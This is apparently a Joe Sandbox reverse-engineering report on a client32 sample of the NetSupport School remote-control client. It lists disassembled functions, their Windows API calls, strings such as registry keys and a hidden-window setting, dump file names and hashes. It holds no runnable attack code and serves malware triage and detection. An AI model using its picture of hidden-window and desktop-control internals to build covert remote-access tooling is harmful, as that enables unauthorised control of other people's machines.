Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1

CheckMenuItem.USER32 ref: 1102384D
ShowWindow.USER32(?,00000003), ref: 110238D1
LoadMenuA.USER32 ref: 110239FB
GetSubMenu.USER32(00000000,00000000), ref: 11023A09
CheckMenuItem.USER32 ref: 11023A29
GetDlgItem.USER32(?,000013B2), ref: 11023A3C
GetWindowRect.USER32(00000000), ref: 11023A43
PostMessageA.USER32 ref: 11023A99
DestroyMenu.USER32 ref: 11023AA3

Strings

AddToJournal, xrefs: 110239AB
Chat, xrefs: 110239B0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
String ID: AddToJournal$Chat
API String ID: 693070851-2976406578
Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95

Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetLocalTime.KERNEL32(?), ref: 110A1778

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110A1600, 110A165A, 110A168E, 110A16E3, 110A1717, 110A180C
LESSON=, xrefs: 110A14E0
IsA(), xrefs: 110A1605, 110A165F, 110A1693, 110A16E8, 110A171C, 110A1811
CLASSID=, xrefs: 110A155B
_%04d_%02d_%02d_%02d%02d, xrefs: 110A17A6
[JNL] MakeFileName ret %s, xrefs: 110A1822
_%s, xrefs: 110A1730
%s\%s, xrefs: 110A15E1
\/:*?"<>|, xrefs: 110A151F, 110A1596
%s\, xrefs: 110A1633
%s_, xrefs: 110A16A7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 2014016395-1677429133
Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5

Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
ShowWindow.USER32(00000000,00000000), ref: 11131457

Strings

gUI.hidden_window, xrefs: 11131441
Hidden, xrefs: 111313C7, 11131411
UI.CPP, xrefs: 1113143C
Client, xrefs: 11131472
#32770, xrefs: 111313CC, 11131416
StatusMode, xrefs: 1113146D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLastShowWindow
String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
API String ID: 3252650109-4091810678
Opcode ID: 6b7386f06e141192f61cafb0ee5b2f9076c210be31482568a81b87e7581885dc
Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
Opcode Fuzzy Hash: 6b7386f06e141192f61cafb0ee5b2f9076c210be31482568a81b87e7581885dc
Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84

Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F732D
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7372
GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0), ref: 110F73C3
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F73FD
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451

Strings

WTSFreeMemory, xrefs: 110F73BD, 110F73F7
WTSQuerySessionInformationA, xrefs: 110F7368
Wtsapi32.dll, xrefs: 110F7328

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$Free$Load
String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 2188719708-2019804778
Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61

Function 110278D0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11027914

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

WaitForMultipleObjects.KERNEL32 ref: 11027983
PostMessageA.USER32 ref: 110279A0
SetEvent.KERNEL32(0000015C), ref: 110279B1
Sleep.KERNEL32(00000032), ref: 110279B9
PostMessageA.USER32 ref: 110279EE
GetCurrentThreadId.KERNEL32 ref: 11027A1A
GetThreadDesktop.USER32(00000000), ref: 11027A21
SetThreadDesktop.USER32 ref: 11027A2A
CloseDesktop.USER32 ref: 11027A35
CloseHandle.KERNEL32(00000234), ref: 11027A75

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

Strings

Async, xrefs: 110278F8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
String ID: Async
API String ID: 3276504616-2933828738
Opcode ID: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
Instruction ID: e67d87833e8f5e22c8d898940d2622bc971bcbde67a649a31d645776c06e00d8
Opcode Fuzzy Hash: 6cee38a70aae2f38755eebf98c3c7587f70e735ab38d84b72a1d7921366109c4
Instruction Fuzzy Hash: 1441DF74B427259BE705DFE4C884B6AF7A8BB54718F000178E921DB688EB70A900CB91

Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

GetDlgItem.USER32(?,00000472), ref: 1103F557

Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F

wsprintfA.USER32 ref: 1103F5D1
GetSystemMenu.USER32 ref: 1103F5F6
EnableMenuItem.USER32 ref: 1103F604
SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
MessageBeep.USER32(00000000), ref: 1103F696

Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F63B, 1103F670
%sblockapp.jpg, xrefs: 1103F5CB
m_hWnd, xrefs: 1103F640, 1103F675
Client, xrefs: 1103F5AD
BlockedAppFile, xrefs: 1103F5A8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1300213680-78349004
Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55

Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1105F251
wsprintfA.USER32 ref: 1105F265

Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000), ref: 110ED59B

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C

wsprintfA.USER32 ref: 1105F5D6

Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1105F3D1, 1105F434, 1105F47B, 1105F4C5, 1105F4FC, 1105F689, 1105F6D6
Software\Productive Computer Insight, xrefs: 1105F238, 1105F5C5
IsA(), xrefs: 1105F3D6, 1105F439, 1105F480, 1105F4CA, 1105F501, 1105F68E, 1105F6DB
NetSupport School Pro, xrefs: 1105F330, 1105F493
ConfigList, xrefs: 1105F2E7, 1105F36C, 1105F628
Software\NetSupport Ltd, xrefs: 1105F254
General\ProductId, xrefs: 1105F30B, 1105F32B, 1105F3F1, 1105F6A9
%s\%s, xrefs: 1105F245, 1105F25F
Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList, xrefs: 1105F5D0
NetSupport School, xrefs: 1105F310, 1105F44C, 1105F4A5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 273891520-33395967
Opcode ID: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
Opcode Fuzzy Hash: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61

Function 11059B00 Relevance: 19.7, APIs: 13, Instructions: 243windowCOMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11059C29
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 11059C3A
DeleteObject.GDI32(?), ref: 11059C4B
PostMessageA.USER32 ref: 11059CB6
GetCursorPos.USER32(?), ref: 11059CED

Part of subcall function 110585A0: GetTickCount.KERNEL32(Client,DisableWirelessInfo,00000000,00000000,B24479DC,?,?,?), ref: 11058616

Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 1109599E
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959A7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959AE
Part of subcall function 11095990: GetSystemMetrics.USER32(00000000,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959B7
Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959BD
Part of subcall function 11095990: GetSystemMetrics.USER32(00000001,?,?,75097D2F,?,11119DE6,?,00000000,?,1118B61B,00000002), ref: 110959C5

GetDC.USER32(00000000), ref: 11059CBE
GetPixel.GDI32(00000000,00000000,00000000), ref: 11059CCB
SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 11059CD7
ReleaseDC.USER32(00000000,00000000), ref: 11059CE0
GetSystemMetrics.USER32(0000004C), ref: 11059D2B
GetSystemMetrics.USER32(0000004D), ref: 11059D31
GetTickCount.KERNEL32 ref: 11059D9D
_free.LIBCMT ref: 11059E20

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
String ID:
API String ID: 4025550384-0
Opcode ID: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
Instruction ID: abc6ed23ccba68bf9f12691c10e6e213c1dc765ac58f2aea97efe2483c19e439
Opcode Fuzzy Hash: 6b09ab56ba7aa2d9871548d0baf0998abdf32238385c40171b047bc0ecf63eb2
Instruction Fuzzy Hash: 41A1A271E007099FEBA5DF64C984BEABBF8BF49304F10456DE51A97284EB70A980CF50

Function 11049810 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 398COMMON

Download Yara Rule

Strings

_debug, xrefs: 1104986F
Client, xrefs: 1104984F
Start Journal, params=%s, xrefs: 110499D3
libhpdf.dll, xrefs: 110498EB
Adding Journal Item, type=%d, xrefs: 11049C1F
Journal prevented duplicate lesson details, xrefs: 11049BF9
Stop Journal, xrefs: 11049A18
DisableJournal, xrefs: 1104984A
NC_JOURNAL jcmd=%d, xrefs: 11049897
TraceJournal, xrefs: 1104986A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __wcstoi64
